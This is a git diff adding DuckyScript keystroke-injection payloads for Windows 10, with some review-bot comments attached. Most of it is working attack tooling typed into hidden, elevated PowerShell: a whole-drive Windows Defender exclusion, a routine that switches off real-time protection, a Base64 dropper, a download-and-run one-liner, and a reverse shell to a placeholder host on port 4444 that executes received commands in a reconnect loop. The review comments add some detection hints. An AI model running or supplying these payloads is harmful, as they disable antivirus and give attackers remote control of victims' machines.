@@ -0,0 +1,51 @@ +REM Title: Rickroll with Max Volume spam +REM Author: @beigeworm +REM Description: Uses Powershell to create a .vbs script to keep volume maximised and opens youtube for rickroll. +REM Target: Windows 10 + +REM some setup for dukie script. +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window). +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +REM create the .vbs script to keep the volume maxed. +STRING cmd +ENTER +STRING copy con volup.vbs +ENTER +STRING do +ENTER +STRING Set WshShell = CreateObject("WScript.Shell") +ENTER +STRING WshShell.SendKeys(chr(&hAF)) +ENTER +STRING WScript.Sleep 10 +ENTER +STRING loop +ENTER +CTRL z +ENTER +STRING start volup.vbs +ENTER +DELAY 1000 +STRING exit +ENTER +DELAY 1000 + +REM start Microsoft Edge and open YouTube with Rick Astley - Never Gonna Give You Up. +GUI r +DELAY 1000 +STRING msedge.exe --new-window -kiosk https://www.youtube.com/watch?v=dQw4w9WgXcQ +ENTER +DELAY 2000 +STRING f + + + diff --git a/Pranks/Start Windows-93 (parody edition).txt b/Pranks/Start Windows-93 (parody edition).txt new file mode 100644 index 0000000..4c8015e --- /dev/null +++ b/Pranks/Start Windows-93 (parody edition).txt @@ -0,0 +1,33 @@ +REM Title: Start Windows-93 (parody edition) +REM Author: @beigeworm +REM Description: Kills all running egde processes then opens edge in fullscreen on windows-93. +REM Target: Windows 10 + +REM some setup for dukie script. +DEFAULT_DELAY 100 + +REM open cmd and kill edge. +GUI r +DELAY 500 +STRING cmd +DELAY 200 +CTRL-SHIFT ENTER +DELAY 1000 +ALT y +DELAY 1000 +STRING taskkill /F /IM msedge.exe /T > nul +DELAY 100 +ENTER +DELAY 500 +STRING exit +ENTER + +REM open edge and fullscreen. +DELAY 500 +GUI r +DELAY 500 +STRING msedge -kiosk www.windows93.net +DELAY 100 +ENTER +DELAY 1000 +F11 \ No newline at end of file 
diff --git a/Tools/Add Exclusion C-drive.txt b/Tools/Add Exclusion C-drive.txt new file mode 100644 index 0000000..32774f3 --- /dev/null +++ b/Tools/Add Exclusion C-drive.txt @@ -0,0 +1,23 @@ +REM Title: Add Exclusion C-drive +REM Author: @beigeworm +REM Description: Uses Powershell to add an exclusion to Windows Defender to ingore any files within C:/ +REM Target: Windows 10 + +REM some setup for dukie script. +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window). +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +REM add the exclusion path. +STRING Add-MpPreference -ExclusionPath C:/ +ENTER +DELAY 250 +STRING exit +ENTER diff --git a/Tools/Base64 Decode & Execute.txt b/Tools/Base64 Decode & Execute.txt new file mode 100644 index 0000000..8bef849 --- /dev/null +++ b/Tools/Base64 Decode & Execute.txt @@ -0,0 +1,30 @@ +REM Title: Base64 Decode & Execute +REM Author: @beigeworm +REM Description: Uses Powershell to decode a Base64 string and then execute the file. +REM Target: Windows 10 + +REM *SETUP* +REM replace all placeholders throughout the script. + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window) +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +REM *replace this below* +STRING $b64 = 'YOUR_BASE64_STRING_HERE_IN_SINGLE_QUOTES'; + +STRING $decodedFile = [System.Convert]::FromBase64String($b64); + + +REM *replace NAME_HERE and desired filetype (example is .exe)* +STRING $File = "NAME_HERE"+".exe"; + +STRING Set-Content -Path $File -Value $decodedFile -Encoding Byte;& $File \ No newline at end of file diff --git a/Tools/Disable RT-Protection.txt b/Tools/Disable RT-Protection.txt new file mode 100644 index 0000000..fa8c2b4 --- /dev/null +++ b/Tools/Disable RT-Protection.txt 
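Review bot: In `Tools/Add Exclusion C-drive.txt`, `Add-MpPreference -ExclusionPath C:/` is a persistent setting and the script never removes it, but the header does not say so (it also misspells "ignore" as "ingore"). Suggest adding `REM The exclusion stays in place until removed with Remove-MpPreference -ExclusionPath C:/`. `Tools/Download-Execute from Run Prompt.txt` adds the same whole-drive exclusion inside its one-liner without mentioning it in its title or description. On the defensive side, Defender records configuration changes such as new exclusions as event 5007 in its Operational log, and a root-of-drive exclusion is worth alerting on.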
@@ -0,0 +1,30 @@ +REM Title: Disable Real-Time Protection +REM Author: @beigeworm +REM Description: Manually opens Windows Security window and turns offf Real-Time Protection. +REM Target: Windows 10 + + +REM some setup for dukie script. +DEFAULT_DELAY 100 + +REM open Windows Security GUI. +GUI r +DELAY 1500 +STRING windowsdefender:// +ENTER +DELAY 2000 + +REM run through option list and turn RT-protection off. +ENTER +TAB +TAB +TAB +TAB +ENTER +DELAY 200 +SPACE +DELAY 300 +ALT y +DELAY 400 +ALT F4 + diff --git a/Tools/Download-Execute from Run Prompt.txt b/Tools/Download-Execute from Run Prompt.txt new file mode 100644 index 0000000..ad1d856 --- /dev/null +++ b/Tools/Download-Execute from Run Prompt.txt @@ -0,0 +1,23 @@ +REM Title: Download-Execute from Run Prompt +REM Author: @beigeworm +REM Description: Uses the Run Prompt to download a file and run it. +REM Target: Windows 10 + +REM *SETUP* +REM replace FILE_URL_HERE with the url of your file to run. + +REM some setup for dukie script. +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window). +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass -C cd $env:Temp;Add-MpPreference -ExclusionPath C:\;Start-Sleep 1; + +REM replace FILE_URL_HERE below. +STRING iwr -Uri FILE_URL_HERE -OutFile upl.exe;Start-Sleep 1;Start upl.exe;exit + +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 diff --git a/Tools/Set US Keyboard & System Language.txt b/Tools/Set US Keyboard & System Language.txt new file mode 100644 index 0000000..1866494 --- /dev/null +++ b/Tools/Set US Keyboard & System Language.txt 
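Review bot: In `Tools/Disable RT-Protection.txt`, the key sequence switches real-time protection off and then closes the window with `ALT F4`; the script does not restore the setting itself, and the header does not say so (it also has the typo "offf"). Suggest `REM This script does not re-enable real-time protection; turn it back on in Windows Security afterwards`. Defender logs the change as event 5001 in its Operational log, which is the signal to look for when this window opens and closes unattended.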
@@ -0,0 +1,30 @@ +REM Title: Set System Language +REM Author: @beigeworm +REM Description: Uses Powershell to set the Windows system lanuage (exame is UK-US). +REM Target: Windows 10 + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window) +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +REM set system language to (example here is US) +STRING Dism /online /Get-Intl +ENTER +DELAY 500 +STRING Set-WinSystemLocale en-US +ENTER +DELAY 500 +STRING Set-WinUserLanguageList en-US -force +ENTER +DELAY 500 +STRING exit +ENTER + diff --git a/Tools/Simple NetCat Client.txt b/Tools/Simple NetCat Client.txt new file mode 100644 index 0000000..d442d52 --- /dev/null +++ b/Tools/Simple NetCat Client.txt @@ -0,0 +1,28 @@ +REM Title: Simple NetCat Client +REM Author: @beigeworm +REM Description: Uses Powershell to start a Netcat client that stays open until the system is restarted. +REM Target: Windows 10 + +REM *REQUIREMENTS* +REM start a netcat listener on server machine using port 4444 (eg. nc -lvp 4444). + +REM *SETUP* +REM replace YOUR_IP_OR_DOMAIN_HERE with ncat server address. + +REM some setup for dukie script. +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window). +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +REM write out the main Powershell code. +STRING do{;$v = 4;$a = New-Object SyStem.NeT.sockeTs.TCPClieNt("YOUR_IP_OR_DOMAIN_HERE",4444) +STRING ;$b = $a.GetStream();[byte[]]$c = 0..65535|%{0};while(($d = $b.Read($c, 0, $c.Length)) -ne 0){;$e = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($c,0, $d) +STRING ;$f = (iex $e 2>&1 | Out-String );$g = $f + (pwd).Path + '> ';$h = ([text.encoding]::ASCII).GetBytes($g);$b.Write($h,0,$h.Length);$b.Flush()};$a.Close();Sleep 10}while ($v -le 5) +ENTER \ No newline at end of file
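Review bot: In `Tools/Set US Keyboard & System Language.txt`, `Set-WinSystemLocale en-US` and `Set-WinUserLanguageList en-US -force` overwrite the existing settings without recording them, so the target cannot be put back the way it was. The header should say so, or the script should save the output of `Get-WinSystemLocale` and `Get-WinUserLanguageList` before changing anything. The description line also has typos ("lanuage", "exame").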
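Review bot: In `Tools/Simple NetCat Client.txt`, "Netcat client" undersells what the typed code does: every string received on the socket is passed to `iex` in an elevated PowerShell, and the `do { ... } while ($v -le 5)` loop reconnects after `Sleep 10` until the machine restarts, so whoever answers on port 4444 at the configured address has command execution on the host. The header should state this plainly, e.g. `REM Effect: remote command execution as administrator over plain TCP; runs until the system is restarted`. For detection, the pattern visible here is powershell.exe holding or repeatedly retrying an outbound TCP connection to port 4444.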